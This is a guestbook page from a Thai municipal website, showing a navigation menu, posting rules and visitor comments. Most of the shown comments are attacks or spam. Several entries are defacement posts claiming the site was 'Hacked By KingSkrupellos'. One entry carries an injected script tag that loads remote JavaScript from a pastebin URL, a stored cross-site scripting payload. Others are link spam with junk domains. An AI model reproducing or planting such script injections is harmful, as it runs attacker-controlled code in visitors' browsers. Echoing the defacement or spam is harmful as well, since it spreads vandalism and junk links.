• ประวัติเทศบาล
• ข้อมูลทั่วไป
• ชุมชนเทศบาล
• อำนาจหน้าที่
• วิสัยทัศน์ พันธกิจ
• ยุทธศาสตร์การพัฒนา
• แผนพัฒนาเทศบาล
• งบประมาณ
• โครงสร้างฝ่ายบริหาร
• โครงสร้างฝ่ายนิติบัญญัติ
• โครงสร้างส่วนราชการ
• โรงเรียนเทศบาลบ้านกล้วย
• โรงเรียนเทศบาลเขาท่าพระ
• โรงเรียนเทศบาลวัดหัวยาง
• ศูนย์พัฒนาเด็กเล็กเทศบาลเขาท่าพระ
• งานบริการข้อมูลข่าวสาร
• งานขออนุญาตก่อสร้างอาคาร
• งานขออนุญาตสาธารณสุข
• งานชำระภาษี
• งานทะเบียนราษฎร
• ประกาศ ประชาสัมพันธ์
• ประกาศ จัดซื้อจัดจ้าง
• ภาพกิจกรรม
• รายงานการประชุม
• รายงานงบการเงิน
• รายงานผลการดำเนินงาน
• คู่มือประชาชน
• กฎหมาย ระเบียบ
• สาระ องค์ความรู้ Knowledge
• ดาวโหลด
Complain
Guestbook
Webboard
สำหรับผู้ดูแลระบบ
วัตถุประสงค์ของสมุดเยี่ยมชม
เป็นช่องทางในการสื่อสารจากประชาชน ท่านสามารถฝากข้อคิดเห็น แนะนำ ติชม และข้อมูลอื่นๆ ให้กับเทศบาลเมืองชัยนาท
โดยผู้ที่ลงนามพึงปฏิบัติดังนี้
1. กรุณาใช้ถ้อยคำที่สุภาพ และเหมาะสม
2. เทศบาลเมืองชัยนาทขอสงวนสิทธิ์ในการลบข้อความที่ไม่สุภาพ ไม่เหมาะสม หรือผิดวัตถุประสงค์
การพาดพิงถึงบุคคลที่สาม โดยไม่เกี่ยวข้องกับงานหรือกิจกรรมของเทศบาลเมืองชัยนาท
โพสต์ข้อคิดเห็น แนะนำ ติชม
จำนวนความคิดเห็นทั้งหมด 37 ความคิดเห็น


จาก: Hacked (45.55.49.75) โพสต์เมื่อ: วันที่ 10 ธันวาคม 2560 , เวลา 04:24:31 น.
E-mail: dfsfd@dfghg.gov
ID: 34
Hacked By KingSkrupellos CyBeRiZM.OrG Digital Security Technological Turkish Moslem Army


จาก: Hacked (45.55.49.75) โพสต์เมื่อ: วันที่ 10 ธันวาคม 2560 , เวลา 04:23:39 น.
E-mail: dsf@fghgf.gov
ID: 33
Hacked By KingSkrupellos CyBeRiZM.OrG Digital Security Technological Turkish Moslem Army


จาก: Hacked (45.55.49.75) โพสต์เมื่อ: วันที่ 10 ธันวาคม 2560 , เวลา 04:23:04 น.
E-mail: dsdfg@fghgf.gov
ID: 32
Hacked By KingSkrupellos CyBeRiZM.OrG Digital Security Technological Turkish Moslem Army


จาก: Hacked By KingSkrupe (45.55.49.75) โพสต์เมื่อ: วันที่ 10 ธันวาคม 2560 , เวลา 04:22:34 น.
E-mail: gfsdfd@dfghgf.gov
ID: 31
Hacked By KingSkrupellos CyBeRiZM.OrG Digital Security Technological Turkish Moslem Army


จาก: Hacked By KingSkrupe (45.55.49.75) โพสต์เมื่อ: วันที่ 10 ธันวาคม 2560 , เวลา 04:21:32 น.
E-mail: thailand@go.th
ID: 30
Hacked By KingSkrupellos CyBeRiZM.OrG Digital Security Technological Turkish Moslem Army


จาก: afdfsgfgdfgsf (45.55.49.75) โพสต์เมื่อ: วันที่ 10 ธันวาคม 2560 , เวลา 04:21:13 น.
E-mail: dsf@fghgf.gov
ID: 29
dsfgfhfgdfsdsa


จาก: Crot (223.255.230.18) โพสต์เมื่อ: วันที่ 19 พฤศจิกายน 2560 , เวลา 23:29:10 น.
E-mail: Uh@gmail.com
ID: 28
<script type="text/javascript" src="https://pastebin.com/raw/Vtjh6JWr"></script>


จาก: Google Bot (43.252.18.216) โพสต์เมื่อ: วันที่ 2 พฤศจิกายน 2560 , เวลา 19:10:49 น.
E-mail: bot@google.com
ID: 27
Google Bot


จาก: LkLLfnFc7u (188.143.234.155) โพสต์เมื่อ: วันที่ 28 มิถุนายน 2559 , เวลา 03:11:03 น.
E-mail: 57cv6hndavi@hotmail.com
ID: 26
I supspoe that sounds and smells just about right. http://pxuacrp.com [url=http://unhmxgucowh.com]unhmxgucowh[/url] [link=http://usgymbaey.com]usgymbaey[/link]


จาก: kZtzbHudgnqB (188.143.232.32) โพสต์เมื่อ: วันที่ 26 มิถุนายน 2559 , เวลา 20:29:03 น.
E-mail: d6t91p67lib@mail.com
ID: 25
I will be putting this danizlzg insight to good use in no time. http://xxsodwkdpf.com [url=http://qjxjwf.com]qjxjwf[/url] [link=http://wbvakncbz.com]wbvakncbz[/link]


หน้า : 1    2    3    4   ชื่อผู้ลงนาม :
E-mail :
ข้อคิดเห็นหรือเสนอแนะ :
รหัสป้องกันการโพสต์ข้อความอัตโนมัติ : ( กรุณากรอกตัวอักษรตามภาพด้านบน )